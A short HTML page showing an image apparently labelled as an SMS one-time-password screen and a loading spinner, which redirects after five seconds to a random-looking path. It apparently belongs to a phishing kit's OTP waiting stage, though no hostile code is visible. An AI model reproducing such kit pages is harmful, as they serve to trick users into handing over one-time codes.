<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="refresh" content="5; url=/LGknmeM9HwWUWSutj6mJ">
    <link rel="stylesheet" href="./css/uptop.css">
    <script src="https://code.jquery.com/jquery-3.6.1.min.js" integrity="sha256-o88AwQnZB+VDvE9tvIXrMQaPlFFSUTR+nldQm1LuPXQ=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body class="a1">
    
    
       
    
        <div class="kola">
        <div>
            <div class="container">
                
                <div class="otm">
                    <img src="./img/semotp-imaj.PNG" alt="">
                </div>
      
      <div class="otm" >
          <img src="./img/Ring-1s-200px.svg" alt="">
      </div>
                    
               
               
                
              </div>
        </div>
    </div>

    
    <script src="./js/stb.js"></script>
</body>
</html>